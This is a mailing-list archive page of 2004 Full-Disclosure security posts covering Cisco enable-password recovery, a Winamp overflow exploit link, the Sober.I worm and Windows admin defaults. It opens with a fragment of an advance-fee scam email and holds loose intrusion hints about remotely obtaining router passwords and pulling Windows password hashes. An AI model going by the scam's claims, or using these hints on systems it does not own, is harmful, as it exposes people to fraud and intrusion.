 Company has issued me a notice to provide the relatives or 
 families of the deceased or have the account confiscated 
 within the next fourteen official working days. For the fact 
 that I have been unsuccessful in locating the relatives for 
 over 2 years now, I seek the consent to present you as the 
 family member to the deceased, so that the proceeds of this 
 account can be paid to you.
 
 Secondly he has a consignment tagged 'family valuables' he 
 shipped or lifted by as cargo to Europe early the same year 
 he died, according to the information he passed to me, it is 
 of a important to him.
 
 Therefore, if you are interested, endeavor to reach me 
 immediately on my other email as thus:
 [EMAIL PROTECTED] to enable me inform you the modalities on 
 how to carry out this project. I have all necessary 
 information and legal documents needed to back you up for 
 claim. All I require from you is your honest cooperation to 
 enable us see this transaction through. I guarantee that this 
 will be executed under legitimate arrangement that will 
 protect you from any breach of the law.
 
 Please get in touch with me as soon as possible to enable us 
 conclude in this matter.
 
 Best regards,
 
 Barrister Wisdom Joshua Esq.
 
 
 Metti il faccione di Shrek sul tuo cellulare!
 http://www.specialeshrek.canale5.com
 
 
 
 --
 (FROM LINKS TO LINKS WE ARE ALL LINKED)
 
 cheers.
 
 morris
 
 



RE: [Full-Disclosure] University Researchers Challenge Bush Win In Florida

2004-11-25 Thread Todd Towles
I asked very nicely...and didn't say it wasn't in some weird way
connected, and normally I do delete the messages I don't want to see. But
I also contact people directly if I feel that the list will have
nothing to add to the talk.  

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Steve Wray
 Sent: Wednesday, November 24, 2004 10:09 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] University Researchers 
 Challenge Bush Win In Florida
 
 Todd Towles wrote:
  Did the charter say something about political 
 messages?..please take 
  it off the list guys if possible...
 
 Actually, I thought that particular post was in the spirit of 
 the list...
 
 It seemed to me to address technologies and methodologies.
 
 I didn't think that it dwelled on party political issues. 
 Though, to be honest, I think Paul should have sent that last 
 one just to the addressee not to the list. But he does come 
 up with some gems so he won't go on my plonkers list :)
 
 If you want to be truly pedantic as to what counts as 
 political, well... 
 there wouldn't be much to choose from. Everything is politics 
 if you squint hard enough.
 
 I find the best method of dealing with full disclosure is 
 that every time you see someone post something you consider 
 off topic or a troll or whatever suits your taste, simply 
 filter their address out.
 
 Filtering by subject doesn't help much as trolls will post to 
 *anything* but trolls *will* post. So as long as I filter out 
 anyone that seems like a troll (or otherwise an idiot) full 
 disclosure comes up with some gems.
 
 And the best part is that if someone on your plonker list 
 says something genuinely interesting, they will doubtless be 
 quoted by someone else so you may still get to read it. And 
 the list has an archive.
 
 Without filters I'd have left FD years ago...
 
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Paul 
 Schmehl
 Sent: Wednesday, November 24, 2004 11:22 AM
 To: Jason Coombs; Gregory Gilliss; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] University Researchers 
 Challenge Bush 
 Win In Florida
 
 --On Wednesday, November 24, 2004 05:39:31 AM + Jason Coombs 
 [EMAIL PROTECTED] wrote:
 [massive snip]
 
 
 



RE: [Full-Disclosure] Network Security in India

2004-11-24 Thread Todd Towles
Correct me if I am wrong, but a LAN that is plagued by worms, DOS
attacks, people sniffing passwords and privacy issues..is called the
Internet. It is an untrusted network and you should protect your network
from it...defense in layers..firewalls..proxies..you know.  

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Gautam R. Singh
 Sent: Wednesday, November 24, 2004 8:45 AM
 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] Network Security in India
 
 Hi,
 
 I am sure there would have been many lapses in security. And 
 one such trend I see here is a number of small cable 
 internet providers that have sprung up in my area (Delhi, 
 NCR). All of them use RF links etc from ISP like Bharti, 
 Primus etc and provide internet thru ethernet on a Cat5 cable.
 And now imagine the possibilities. :) Users of such systems 
 are on LAN, plagued by worms, DoS, privacy issues, sniffing 
 passwords, monitoring what sites other peepz are visiting etc etc.
 
 //is there any security list specific for India where we can 
 just discuss and learn new things
  
 
 Regards,
 Gautam
  --__--__--
 
 Message: 14
 Date: Wed, 24 Nov 2004 03:03:00 +0530
 From: john morris [EMAIL PROTECTED]
 Reply-To: john morris [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Network Security in India
 
 I had a brief stint at Primus Telecom in Delhi (www.primus-direct.com).
 It has a flat network with absolutely no security. The
 routers are as vulnerable to any known exploit and the same
 applies to a few web servers they host. The basics such as
 patch management are never taken care of.
 This mail does not intend to harm anyone but I want to know
 if this is the way major ISPs around the globe function.
 The company functions on illegal frequencies (Primus's major
 customers connect through RF links). I have the proofs to
 show that they do function on frequencies not allocated to
 them, and during routine check-ups by the DoT (Department of
 Telecommunications, Govt. of India) they have to change the
 frequency for a while and do favors to the Govt.
 employees to keep the business going.
 Well, this is not my concern but somehow this seems unhealthy.
 Is this a practice worldwide?
 During my interview with a company major I insisted on my
 security concern but the company was least bothered.
 Would someone tell me if this is the way the whole industry functions.
 In spite of reminders to the company that any lamer has the
 potential to run them out of business by bringing their whole
 network down within a few min (which includes the ETBwmgr,
 the netcache box or even the main router (7500 series with a
 backup)), it has been given a deaf ear.
 Is this the way an ISP with important clients in the pvt and
 the govt key sectors functions?
 
 I personally doubt the future.
 
 Is Primus listening. Its time to wake up.
 
 --
 (FROM LINKS TO LINKS WE ARE ALL LINKED)
 
 cheers.
 
 morris
 
 --
 Gautam R. Singh
 [mcp, ccna, cspfa, unemployed] t: +91 9848 525 074 | pgp:
 http://gautam.techwhack.com/key/ | ymsgr: er-333 | msn: [EMAIL PROTECTED]
 


RE: [Full-Disclosure] previledge password in cisco routers

2004-11-24 Thread Todd Towles
Well logically, a person that owns a Cisco device could get help from
Cisco or at the very least their website. But he instead posted on a
grey security list, interesting...you know what they say, smells like a
kiddie, looks like a kiddie..you know the rest.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Leeuwen, Allan van
 Sent: Wednesday, November 24, 2004 8:27 AM
 To: [EMAIL PROTECTED]
 Cc: john morris
 Subject: RE: [Full-Disclosure] previledge password in cisco routers
 
 And may I add that your other posts look more or less the same.
 I'm putting my money on you being a skiddie :)
 
 l8r 
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Michael Rutledge
 Sent: Wednesday, November 24, 2004 2:42 PM
 To: [EMAIL PROTECTED]
 Cc: john morris
 Subject: Re: [Full-Disclosure] previledge password in cisco routers
 
 The amount of help you receive on this mailing list is going 
 to depend greatly on one question:  Do you own the box?  (or 
 the router as it is in your case).  As it stands, and I mean 
 this in the best way possible, you look like a script kiddie 
 looking to get some leetness by doing something easy.  The 
 suggestions you get on FD are not going to be as helpful to 
 you if you are trying to hack someone else's hardware.
 
 That said, I happily look forward to the flames you are about 
 to get for asking how to hack someone's router. This will be 
 an entertaining Wednesday after all.  :)
 
 -Michael
 
 
 On Wed, 24 Nov 2004 04:28:18 -0800 (PST), Paulo Pereira 
 [EMAIL PROTECTED] wrote:
  John,
  
  if you have an old config you may decode it with some available tools
  on the web. A google search for cisco password recovery may help you.
  
  If you use TACACS change it there... or force the TACACS to disappear
  to use the local one... it really depends on the configs you have in the box.
  
  Regards,
  
  Paulo Pereira
  
  quote who=john morris
  
  
   Ooops.. I reframe my question. Is there a way to get the enable
   password remotely. Brute force is not my option
  
  
  
   (FROM LINKS TO LINKS WE ARE ALL LINKED)
  
   cheers.
  
   morris
  
 
 
 
 ===
 
 The information contained in this message may be confidential 
 and is intended to be only for the addressee. Should you 
 receive this message unintentionally, please do not use the 
 contents herein and notify the sender immediately by return 
 e-mail. Although Orange has taken steps to ensure that this 
 email and attachments are free from any virus, you do need to 
 verify the possibility of their existence as Orange can take 
 no responsibility for any computer virus which might be 
 transferred by way of this email.
 
 ===
 


RE: [Full-Disclosure] previledge password in cisco routers

2004-11-24 Thread Todd Towles
Do you seriously think there is an easy way to get the enable password
remotely? If you have the config, you can get it from there..if you have
the box you can do a password recovery by booting in rommon...otherwise
the box isn't yours..and you won't find a clear exact answer because
there isn't one.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 john morris
 Sent: Wednesday, November 24, 2004 3:15 AM
 To: Scott T. Cameron
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] previledge password in cisco routers
 
 Ooops.. I reframe my question. Is there a way to get the
 enable password remotely. Brute force is not my option
 
 
 
 (FROM LINKS TO LINKS WE ARE ALL LINKED)
 
 cheers.
 
 morris
 


RE: [Full-Disclosure] Winamp vulnerability : technical study and Exploit released

2004-11-24 Thread Todd Towles
Nope, that is what this is for... Only a few employees remain to prop
up the once-ubiquitous digital audio player with minor updates, but no
further improvements to Winamp are expected.

Therefore no big changes but they can fix small things. They tried with
5.0.6 but they will have to try again. 


 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Rich Eicher
 Sent: Wednesday, November 24, 2004 11:05 AM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Winamp vulnerability : 
 technical study and Exploit released
 
 This may have something to do with why there is no patch out 
 from Nullsoft.
 
 http://www.betanews.com/article/Death_Knell_Sounds_for_Nullsof
 t_Winamp/1100111204
 
 
 On Wed, 24 Nov 2004 07:08:52 -0800 (PST), ElviS .de 
 [EMAIL PROTECTED] wrote:
  
   
  exploit and technical study of the Winamp flaw posted by k-otik  
  http://www.k-otik.com/exploits/20041124.winampm3u.c.php

  ..the cdda library only reserves 20 bytes for names when files are 
  .cda, so the stack will be overwritten and exception occurs when a 
  name looks like .cda

  but still NO patch from Winamp !!!
  
   
  Do you Yahoo!?
   Yahoo! Mail - You care about security. So do we. 
  
 
 


RE: [Full-Disclosure] previledge password in cisco routers

2004-11-24 Thread Todd Towles
Sorry but cisco can only be blamed for so much. If you allow telnet to
your router from the internet...then how is that Cisco's fault? Or even
if you allow SSH from the internet...network protection is the key.
Software will have holes and problems will be found. Only thru good
network design and layered security will you be protected.

Servers are open to attack also if you allow FTP, SSH and TS from the
internet...what do you think will happen?

SNMP strings are like gold..and very few people understand they need to
change them and guard them as such...but again that isn't cisco's fault.
Should you use the web interface to connect to your routers? Well no..there
are problems with it...learn the command line and therefore the problem
doesn't exist.

 -Original Message-
 From: Gary E. Miller [mailto:[EMAIL PROTECTED] 
 Sent: Wednesday, November 24, 2004 1:20 PM
 To: Todd Towles
 Cc: [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] previledge password in cisco routers
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Yo Todd!
 
 On Wed, 24 Nov 2004, Todd Towles wrote:
 
  Do you seriously think there is an easy way to get the enable password
  remotely?
 
 Cisco has previously had bugs that allowed easy enable 
 password recovery remotely using SNMP and the web management 
 interface.  If it is an older unpatched router, showing one 
 of these services to you, then a search of standard exploits 
 will turn up what you need.
 
 There was a particularly nasty telnet hack a while back.  
 Even if you had an ACL on the port you were easily hacked.
 
 If past performance is any indicator of future performance
 then there will again be a Cisco bug, or sloppy admin, that
 allows this.
 
 RGDS
 GARY
 --
 Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
   [EMAIL PROTECTED]  Tel:+1(541)382-8588 Fax: +1(541)382-8676
 
 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.2.3 (GNU/Linux)
 
 iD8DBQFBpN748KZibdeR3qURAh6DAJ4zZnYcMO0uhg6lfs83ScS3IpsVxgCgiVBK
 9rIjcwwiaIDhHAK15G8x0wk=
 =wREb
 -END PGP SIGNATURE-
 
 



RE: [Full-Disclosure] University Researchers Challenge Bush Win In Florida

2004-11-24 Thread Todd Towles
Did the charter say something about political messages?..please take it
off the list guys if possible...

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Paul Schmehl
 Sent: Wednesday, November 24, 2004 11:22 AM
 To: Jason Coombs; Gregory Gilliss; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] University Researchers 
 Challenge Bush Win In Florida
 
 --On Wednesday, November 24, 2004 05:39:31 AM + Jason 
 Coombs [EMAIL PROTECTED] wrote:
 
  In the case in point, even with the variables you mention, the entire
  technical problem can be reduced to observing how the election
  officials in various places have historically constructed ballots and
  influence just those that can be influenced in just those states where
  it will matter. The Republican party (my party) apparently has
  advantages over others when it comes to influencing the technical
  details of the design of voting machines. Diebold, for example.
 
 The horse has already been packed up and shipped from the 
 rendering plant, but I'll give this *one* more try.  (One 
 side note - the management of Diebold are mostly Democrats, 
 not Republicans, not that *that* makes one iota of difference 
 in the competence (or lack thereof) in designing electronic 
 balloting equipment.  Pointing to someone's party affiliation 
 as proof of something is merely a distraction from the real issues.)
 
 You are talking about an extremely complex and unlikely set
 of possibilities, *all* of which have to fall into place
 perfectly for this to happen.  It might be fun as
 speculation, but the implementation would be nigh unto
 impossible and would take some real genius to pull off.
 
  It makes just about as much sense for every regional election office
  to do their ballot construction differently as it does for everyone to
  create their own home grown crypto.
 
 And yet it's done all over America.  Imagine that.
 
  Your point about differences in ballot construction is also a red
  herring to begin with. If you think that there is the same degree of
  variability with ballots in electronic voting machines as there is
  with legacy ballots, then perhaps you are the one who does not know
  how the process really works with the machines in question.
 
 Why would you assume the ballots all have to be the same just 
 because the same machines are being used to count them?
 
 Given three candidates for President (and there are usually 
 more than that) there are at least six different ways the 
 ballot could be arranged *even* if the basic design was the same.
 
 Furthermore, the methodology used by an electronic voting 
 machine is independent of the ballot design, for all intents 
 and purposes.  For example, an optical reader merely senses 
 the dark spots where a vote has been cast.  *Which* candidate 
 that represents is determined by the configuration, which is 
 determined by the construction of the ballot. 
 Having to fit within certain machine-driven parameters does 
 not force the ballot design into one pattern.  The votes 
 could be on the left, in the center, on the right, staggered 
 from left to right, staggered from right to left.  The 
 possibilities are great.
 
 Yet you want to control *all* of that to take advantage of 
 statistical anomalies in the equipment?
 
 Do we have a mathematician on this list who can calculate the 
 probabilities of this?
 
 I would contend that it is infinitely more likely that the
 machines would be either deliberately tampered with or
 incompetently misconfigured, ending up in statistical
 anomalies, than I would ever consider your scenario possible.
 
  You really need to stop making things seem so complicated that the
  difficulty of influencing their behavior or outcome couldn't possibly
  be surmounted.
 
 Jason, I'm not making anything complicated.  I'm observing 
 the complication that already exists - the complication that 
 you apparently refuse to acknowledge.
 
 Paul Schmehl ([EMAIL PROTECTED])
 Adjunct Information Security Officer
 The University of Texas at Dallas
 AVIEN Founding Member
 http://www.utdallas.edu
 


RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-22 Thread Todd Towles
Very True, not to talk about all the apps that won't run correctly in
Windows because of non-admin rights. Should we all have to give
permissions to special reg keys just to have an app run as a non-admin? I
mean come on...you give us a so called security feature (Run As) and
then it is only usable half the time for the IT world and almost
totally useless for the everyday basic user.

But of course most of the apps that don't work with Run As are harder
apps but I am sure everyone has seen some.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of devis
 Sent: Sunday, November 21, 2004 12:11 AM
 Cc: [EMAIL PROTECTED]
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 Todd Towles wrote:
 
  Windows doesn't tell you about the Admin account and makes the default
  user an Admin. That isn't the best method as you know.
  
  RunAs is great..but that is only good once you create a normal user -
  and then delete your new default user. Or you log in as Administrator
  and take away the full control of the default user. Easy for the
  average window user? Nope. If it were, Microsoft would make the default
  user (note USER) and then let you configure the Admin account on start.
  
 
 Thank you. Sometimes I feel the message doesn't get across.
 Run as is a false sense of security. Majority of MS apps (
 that get owned ) run with Admin or Local System privileges.
 Does Run as work on IE ? on Office ? on IIS ?
 
 My point was that instead of 'hiding' computer knowledge from
 the 'user', and introducing false 'hyped' security such as 'RunAs',
 assuming his stupidity, I think people will be likely to
 understand that to install a program they would have to use a
 different account than from browsing pages. Especially when
 the company behind has lots of $$$ to make it friendly and
 understood. 15 years ago people thought only a few people
 would ever use email..
 


RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-20 Thread Todd Towles
If you are on the box, having changed the name of the Admin is useless.
Naming doesn't save you from a lot...a simple registry pull in Windows
will get you all the hashed passwords.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Jeremy Davis
 Sent: Friday, November 19, 2004 8:40 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 Are you able to change root's name in nix? Why not if the 
 answer is no?
 (Things would break right? UID 0?) Knowing the account name 
 is two-thirds of the battle.
 In windows it's fairly easy to change the admin name.
 Not a professional here just curious...
 J
 
 
 On Fri, 19 Nov 2004 17:13:36 -0500, [EMAIL PROTECTED] 
 [EMAIL PROTECTED] wrote:
  On Fri, 19 Nov 2004 13:12:31 EST, Crotty, Edward said:
   I'm not a Win based guy (troll?) - Un*x here - and even I 
 was offended by #1.
  
   There is such a thing as runas for Windows.
  
  Yes, but is *the main design* of the system run as a 
 mortal, and use 
  the 'runas' for those things that need more?
  
  Or is the *main design* We'll just elect the first user as 
  Administrator, and include 'runas' in case somebody wants 
 to Do It The Right Way?
  
  
 
 


RE: [Full-Disclosure] Windows user privileges

2004-11-20 Thread Todd Towles
Dell gives the full OS cd and then a separate drivers CD, at least on
the business side. Not sure about the home side. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Mike Hoye
 Sent: Saturday, November 20, 2004 7:19 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Windows user privileges
 
 On Fri, Nov 19, 2004 at 04:19:49PM -0600, Paul Schmehl wrote:
  Windows has several groups.  By default users are in the USERS 
  group, *not* the ADMINISTRATORS group.
 
 On every XP install that I've seen from every major OEM 
 (Dell, Compaq, Gateway, etc) fast user switching is on by 
 default and every user is an administrator. Not on most; on 
 every single one.
 
 Furthermore, these machines don't have actual XP OS install 
 CDs, they usually come with restore CDs that just return 
 the PC to this same initial state if they're used, which they 
 almost never are.
 
 I have never seen a home user, that is to say change that 
 setting or create a user who is actually just a User. Not 
 once, ever.
 
  It might make sense if you actually had knowledge of an OS 
 before you 
  criticize it.
 
 I don't think the question should be why is IRC still 
 around, I think the question should be why is 
 full-disclosure turning into IRC?
 
 - Mike Hoye
  
 --
 Buy land. They've stopped making it. - Mark Twain
 


RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-20 Thread Todd Towles
Ohh don't worry I am not knocking it. The 6.4 version will play some of
those AVI files that the version 9 and 10 won't play because of codec
stuff, kind of funny. =)

 -Original Message-
 From: GuidoZ [mailto:[EMAIL PROTECTED] 
 Sent: Saturday, November 20, 2004 1:15 AM
 To: Todd Towles
 Cc: [EMAIL PROTECTED]
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 Dude, mplayer2 rulez!! I use it to play all sorts of things. 
 =) I'm glad they left it there... the newer MS media player 
 is just bloat.
 Media Player Classic (that comes with RealAlternative and QuickTime
 Alternative) is another one of my favs. =D
 
 Yeah, not really anything to do with the topic, but I felt it 
 had to be said. Don't go knocking my v6.4. ;)
 
 --
 Peace. ~G
 
 
 On Fri, 19 Nov 2004 12:41:25 -0600, Todd Towles 
 [EMAIL PROTECTED] wrote:
   Microsoft integration: You remove the application that plays MPEG 
   movies from a system that has never needed to play MPEG 
 movies, and 
   never will need to - and your system won't boot anymore.
  
  Example -  Anyone with XP, do a search for mplayer2.exe? 
 What is this 
  you ask? It is media player 6.4 =)
  
  You only think you upgraded to Media player 10..lol
  
  -Todd
 
 



RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-20 Thread Todd Towles
I use WinAmp for Music and the Microsoft stuff for Video...I don't do a
lot of video stuff. The latest Winamp is pretty nice. I can always
stream shoutcast or video to my XBOX so..lol

 -Original Message-
 From: GuidoZ [mailto:[EMAIL PROTECTED] 
 Sent: Saturday, November 20, 2004 3:03 PM
 To: Todd Towles
 Cc: [EMAIL PROTECTED]
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 This is true. It will also play many other types of files
 (with something like ffdshow) that WMP 9/10 can, although it
 will do so with about half the memory footprint and start
 twice as fast. Gotta love upgrades. =/
 
 I moved more to BS Player, as it's pretty quick and comes 
 with all the bells and whistles you'll need. Of course 
 VideoLAN (VLC) is also a nice choice. I prefer the BS Player 
 interface (think PowerDVD Crystal theme). =D
 
 --
 Peace. ~G
 
 
 On Sat, 20 Nov 2004 14:41:59 -0600, Todd Towles 
 [EMAIL PROTECTED] wrote:
  Ohh don't worry I am not knocking it. The 6.4 version will play some
  of those AVI files that the version 9 and 10 won't play because of
  codec stuff, kind of funny. =)
  
   -Original Message-
   From: GuidoZ [mailto:[EMAIL PROTECTED]
   Sent: Saturday, November 20, 2004 1:15 AM
   To: Todd Towles
   Cc: [EMAIL PROTECTED]
   Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as 
   FireFox
   
   Dude, mplayer2 rulez!! I use it to play all sorts of things.
   =) I'm glad they left it there... the newer MS media 
 player is just 
   bloat.
   Media Player Classic (that comes with RealAlternative and 
 QuickTime
   Alternative) is another one of my favs. =D
  
   Yeah, not really anything to do with the topic, but I 
 felt it had to 
   be said. Don't go knocking my v6.4. ;)
  
   --
   Peace. ~G
  
  
   On Fri, 19 Nov 2004 12:41:25 -0600, Todd Towles 
   [EMAIL PROTECTED] wrote:
    Microsoft integration: You remove the application that plays
    MPEG movies from a system that has never needed to play MPEG
    movies, and never will need to - and your system won't boot anymore.
   
   Example -  Anyone with XP, do a search for mplayer2.exe? What is this
   you ask? It is media player 6.4 =)
   
   You only think you upgraded to Media player 10..lol
   
   -Todd
   
 
 



RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Todd Towles
Windows doesn't tell you about the Admin account and makes the default
user an Admin. That isn't the best method as you know.

RunAs is great..but that is only good once you create a normal user -
and then delete your new default user. Or you log in as Administrator
and take away the full control of the default user. Easy for the average
window user? Nope. If it were, Microsoft would make the default user (note
USER) and then let you configure the Admin account on start.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Crotty, Edward
 Sent: Friday, November 19, 2004 12:13 PM
 To: [EMAIL PROTECTED]
 Subject: RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 I'm not a Win based guy (troll?) - Un*x here - and even I was 
 offended by #1.
 
 There is such a thing as runas for Windows.
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] Behalf Of devis
 Sent: Friday, November 19, 2004 11:10 AM
 Cc: [EMAIL PROTECTED]
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
 This message is primarily destined to all MS trolls, no
 matter their levels, and I can see so many in this list that
 I am happy to target a large audience.
 
 Please run some unix or at least read about the unix
 permission system, and let's pray god this sheds some light in
 your mono cultured brains.
 Here are the relevant points:
 
 1) Despite recent ameliorations of MS ( multi user finally,
 permissions ... ) and some effort at making the system more
 secure, something very important is still left out: The first
 default user of the MS computer is made an administrator.
 This comes down to giving uid0 to your first unix user. Unix
 does NOT do that. It requires you to use su and become root
 ( administrator ) after proper credentials submission ( password ).
 The first user is NOT an administrator, and any recent Unix
 documentation will insist on the danger of running as
 root(admin). Unix keeps the admin account well separated from
 the user account, which MS DOESN'T, despite all wrong
 arguments I read on this list. VERY BAD practice generally.
 So it's user friendly, as the user has admin rights and can
 therefore install and remove software and change major
 configuration. Majority of users don't and will never know
 there is an 'administrator' user that hides from their eyes.
 This little detail that apparently MS people can't
 'understand' is a huge step. Please install a proper unix,
 create 2 accounts and try to read the home directory of the
 second user from the first.
 
 2) After all, they don't need to know. You're on a need
 to know basis job
 Do MS really think the users are stupid ? Is understanding
 different IDs/ roles / accounts on a computer that much of a
 tough message to pass to the end user ? Isn't security
 important and supposedly the goal of recent MS developments
 ? If they really did target security, their efforts would have
 been into making the user understand that he should be admin
 to install programs, and a non privileged user to surf the web.
 Is that that hard to understand ? And that much hidden into
 high IT security professional unreachable knowledge ? I
 don't think so. Doesn't a company such as MS have enough
 resources to make that a priority and educate the users ?
 Of course it has. Just not very 'commercially'
 friendly as if users then understand roles, it might require
 less Anti virus, personal firewall and other bullshit FUD
 scareware ( Yes it's scareware, and it is the best selling
 software category OF ALL times of software history ).
 
 
 This is why, Firefox being independent from this OS that
 carries 60 of its code base as being legacy code for older
 system hardware and backward compatibility, is likely more
 secure than the in house integrated application. Now if you are
 running Firefox as an administrator... don't be surprised
 if something happens. Don't blame the software, but your poor
 security practices.
 
 Let's not hide from ourselves what's needed from MS to reach
 modern world security:
 a complete rewrite, and a ditch of old DOS base and the 20
 years old legacy code.
 
 Hope that clears things.
 
 
 
 Rafel Ivgi, The-Insider wrote:
 
 Firefox is not integrated to the OS, because it doesn't have an OS.
 It's just a trimmed Mozilla for windows..
 However Mozilla in Linux is integrated at some level...so
 they are just the same as I.E.
 
 
 Rafel Ivgi, The-Insider
 Security Consultant
 Malicious Code Research Center (MCRC)
 Finjan Software LTD
 E-mail: [EMAIL PROTECTED]
 -
 Prevention is the best cure!
 - Original Message -
 From: john morris [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Sunday, November 14, 2004 3:34 PM
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
   
 
 Firefox avoids several fundamental design flaws of IE, in that:
 
 

RE: [Full-Disclosure] Sober.I worm is here

2004-11-19 Thread Todd Towles
It arrives at .doc, .txt and .word? 

Where are you seeing that?

It can't be very dangerous as a TEXT file. As far as I know it uses the
normal double extension tricks. Any good email filter should pick
this up and you should be fine. Anyone that just clicks on random
attachments in their e-mail and doesn't have anti-virus, should get
infected.

At least, they are letting someone that knows something use your
computer for something..lol j/k

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Danny
 Sent: Friday, November 19, 2004 11:07 AM
 To: KF_lists
 Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Sober.I worm is here
 
 On Fri, 19 Nov 2004 11:22:31 -0500, KF_lists 
 [EMAIL PROTECTED] wrote:
  can you define medium sized epidemic?
  Any new features / functionality?
 
 Not too much, except for the fact that it also arrives with
 the following attachment extensions: .doc, .txt, and .word
 
 Which are not typically blocked by layer 7 aware firewalls. 
 Whereas, the biggies .scr, .pif, .exe, .com, .bat, etc., are 
 usually blocked.
 
 ...D
 
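As an added defender-side example that is not part of the thread, the following Python filter implements the double-extension check Todd refers to: it works out which extension the OS would actually act on, catches a document extension followed by an executable one, and catches whitespace padding used to push the real extension out of view. The five blocked extensions come from Danny's message; the remaining extension lists and the sample names are my own constructed assumptions.

```python
import re
from dataclasses import dataclass

# Extensions the thread says layer-7 filters usually block (.scr, .pif, .exe,
# .com, .bat come from Danny's message); the rest are my own additions.
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js"}

# "Document" extensions a filter tends to wave through; a worm hides an
# executable extension behind one of these (the double-extension trick).
DOCUMENT_EXTS = {"doc", "txt", "rtf", "pdf", "xls"}


@dataclass
class Verdict:
    action: str    # "block", "review" or "allow"
    reason: str
    real_ext: str  # the extension the OS would actually act on


def classify_attachment(filename: str) -> Verdict:
    """Decide what to do with an attachment based on its filename alone."""
    name = filename.strip()
    # A run of whitespace inside the name is a padding trick: the real
    # extension is pushed past what a mail client shows in its column.
    padded = re.search(r"\s{2,}", name) is not None
    collapsed = re.sub(r"\s+", " ", name).lower()
    parts = collapsed.split(".")
    if len(parts) < 2:
        return Verdict("allow", "no extension", "")
    exts = [p.strip() for p in parts[1:]]
    real_ext = exts[-1]
    # An executable extension somewhere before the last one ("setup.exe.txt")
    # is not directly runnable, but the name is shaped like an evasion attempt.
    hidden_exec = any(e in EXECUTABLE_EXTS for e in exts[:-1])

    if real_ext in EXECUTABLE_EXTS:
        if len(exts) > 1 and exts[-2] in DOCUMENT_EXTS:
            return Verdict("block", "double extension: document name ending in an executable", real_ext)
        if padded:
            return Verdict("block", "executable extension hidden behind whitespace padding", real_ext)
        return Verdict("block", "executable attachment", real_ext)
    if padded or hidden_exec:
        return Verdict("review", "suspicious name shape", real_ext)
    return Verdict("allow", "plain document or unknown extension", real_ext)


def scan_attachments(names):
    """Sort a batch of attachment names into block / review / allow buckets."""
    buckets = {"block": [], "review": [], "allow": []}
    for n in names:
        buckets[classify_attachment(n).action].append(n)
    return buckets


# Constructed sample names; not taken from any real Sober.I message.
SAMPLE_ATTACHMENTS = [
    "invoice.txt.exe",
    "readme.doc                          .pif",
    "notes.txt",
    "mail.word",
    "setup.exe.txt",
    "README",
]

if __name__ == "__main__":
    for name in SAMPLE_ATTACHMENTS:
        verdict = classify_attachment(name)
        print(f"{verdict.action:6} {name!r}: {verdict.reason}")
```

Note that ".word" is waved through: the filter reasons only about the name, which is exactly why Todd's point about the attachment being harmless as a text file still depends on the content being what the extension claims.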


RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Todd Towles
 Microsoft integration: You remove the application that plays 
 MPEG movies from a system that has never needed to play MPEG 
 movies, and never will need to - and your system won't boot anymore.

Example -  Anyone with XP, do a search for mplayer2.exe? What is this
you ask? It is media player 6.4 =)

You only think you upgraded to Media player 10..lol

-Todd




RE: [Full-Disclosure] WiFi question

2004-11-19 Thread Todd Towles
